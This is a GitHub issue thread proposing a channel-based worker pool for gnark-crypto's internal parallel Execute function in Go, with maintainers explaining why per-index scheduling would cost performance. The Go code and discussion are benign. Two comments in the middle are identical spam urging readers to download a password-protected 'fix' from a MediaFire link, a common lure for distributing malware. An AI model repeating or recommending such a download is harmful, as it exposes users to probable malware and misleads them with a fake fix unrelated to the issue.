### ISSUE TITLE
proposal for different Execute-function

### ISSUE THREAD

**Issue by holiman** [Consensys/gnark-crypto#528]
This isn't _really_ a bugreport, but I was looking into the internals a bit. And there's a method `Execute`, https://github.com/Consensys/gnark-crypto/blob/master/internal/parallel/execute.go#L9. 

It takes a "slice of work", and partitions it. Then it feeds the slices of work to worker-threads, basically. So, if the work is `0-100`, and we're using two parallel routines, it will invoke `work(0, 50)` on one, and `work(50,100)` on the other. This way of scheduling is a bit naive, since it may happen that the items of work in the `0-50`-range for some reason is heavier. 

It also does some extra work to handle the situation where the number of tasks and number of routines do not match up properly, which complicates the code. 

A more go-idiomatic way of doing this sort of task is to redefine the `work` function to operate only on one `index` (not loop internally). And just feed the indexes over a channel. With that design, any task will immediately be picked up by any available worker. So if one thread happens to be scheduled heavier tasks, that thread will simply perform less of them, overall -- instead of making the world wait while all threads perform exactly the same amount of work-items. 

Here's how I'd do it: 
```golang
package parallel

import (
	"sync"
)

// Execute invokes the work function with indexes 0 to max, and uses nThreads
// goroutines in parallel.
func Execute(max int, work func(int), nThreads int) {
	var (
		workCh = make(chan int)
		wg     sync.WaitGroup
	)
	// Workers performing tasks
	wg.Add(nThreads)
	for i := 0; i < nThreads; i++ {
		go func() {
			// execute work
			for id := range workCh {
				work(id)
			}
			wg.Done()
		}()
	}
	// Scheduler assigning tasks
	for i := 0; i < max; i++ {
		workCh <- i
	}
	close(workCh)
	// Wait until all workers are done
	wg.Wait()
}
```

But it needs some other changes, since the `work func` is modified. LMK if I should make a PR, otherwise I'll drop it.

**Comment by ivokub** [comment]
Thanks for the suggestion. I think @gbotrel implemented the parallel execution framework and is better to give better insights, but afaik there is a tradeoff depending on the length of the tasks. If every individual task is short, then the overhead of scheduling them one-by-one is relatively bigger than letting every goroutine handle many tasks and then wait until all workers have terminated.

And in our use-cases, the individual tasks are usually relatively similar in runtime (usually math operations with similar input sizes etc.), so the workers terminate relatively on time.

But if you can point to particular path in the code where executing tasks one by one would give improvements in performance or memory usage, then it would definitely be a welcomed PR.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by gbotrel** [comment]
agree with @ivokub --> I don't think it's a good pattern against the naive one we use in couple of places in gnark / gnark-crypto;
the use case we have is typically to do a "small" operation on each index of a very large slice, and the workload is usually balanced.

having one task per index is going to kill the perf, the chan is not free, it has a inner sync mechanism, and each go routine from the pool is going to hit that millions of time.
